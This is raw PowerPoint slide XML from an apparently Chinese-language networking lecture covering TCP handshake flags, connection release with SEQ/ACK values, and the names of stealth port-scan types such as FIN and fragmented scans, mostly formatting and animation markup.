                </a:rPr>
                <a:t>SYN+ACK</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" b="1" i="1">
                  <a:solidFill>
                    <a:srgbClr val="6600FF"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>握手</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="6600FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="Text Box 19"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3166343" y="516803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anose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>RST </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" b="1" i="1">
                  <a:solidFill>
                    <a:srgbClr val="6600FF"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>重置</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="6600FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Text Box 20"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2480543" y="6158631"/>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i="1">
                  <a:solidFill>
                    <a:srgbClr val="6600FF"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>没有回应或者其他</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="6600FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>TCP FIN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>扫描</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>分段扫描</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="339970" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>隐蔽扫描技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E31186BA-654F-4C97-9CC0-A3E1AEE28067}"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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>TCP连接的释放</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33795"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3796"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33797" name="Straight Arrow Connector 11"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2189163" y="2276475"/>
            <a:ext cx="4535487" cy="431800"/>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3798" name="Straight Arrow Connector 13"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2195513" y="2997200"/>
            <a:ext cx="4537075" cy="504825"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="33799" name="Straight Arrow Connector 14"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2189163" y="4292600"/>
            <a:ext cx="4535487" cy="504825"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:bevel/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="33800" name="Straight Arrow Connector 16"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2195513" y="1987550"/>
            <a:ext cx="4537075" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:bevel/>
            <a:headEnd type="arrow" w="med" len="med"/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33801" name="TextBox 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3419475" y="161925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itchFamily="49" charset="-122"/>
                <a:sym typeface="黑体"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3802" name="TextBox 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3844925" y="2112963"/>
            <a:ext cx="1881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C00000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>000</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3803"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380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endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="338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TextBox 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3348038" y="2833688"/>
            <a:ext cx="2981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33808" name="TextBox 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3419475" y="4149725"/>
            <a:ext cx="298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SEQ=6001  ACK=8001 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(ACK=1)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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="33809" name="Straight Arrow Connector 18"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2195513" y="5227638"/>
            <a:ext cx="4537075" cy="1587"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:bevel/>
            <a:headEnd type="arrow" w="med" len="med"/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33810" name="TextBox 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3736975" y="485775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Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>连接被释放</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33811" name="Straight Arrow Connector 22"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2195513" y="3573463"/>
            <a:ext cx="4537075" cy="503237"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="1D00C8"/>
            </a:solidFill>
            <a:bevel/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33812" name="TextBox 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3419475" y="3409950"/>
            <a:ext cx="289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endParaRPr lang="en-US" altLang="zh-CN" sz="1400">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5168967"/>
            <a:ext cx="8229600" cy="1569660"/>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buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>RST(Reset)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>RST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>＝</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>表明</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>连接出现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>严重</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>差错，须</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>释放</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>连接再</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>重新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>建立。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>FIN(Final</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>FIN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>＝</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>表明发送端数据发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>完毕</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>，要求释放连接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。</a:t>
            </a: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ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33796"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33796"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3379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3795"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33795"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33795"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33795"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33795"/>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3804"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33804"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33804"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33804"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="23" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="33806"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33806"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33806"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33806"/>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3805"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33805"/>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3803"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33803"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffec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3380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80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797"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3379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802"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3380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33798"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3379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3807"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3380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3812"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3381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33811"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="63" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="338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3799"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
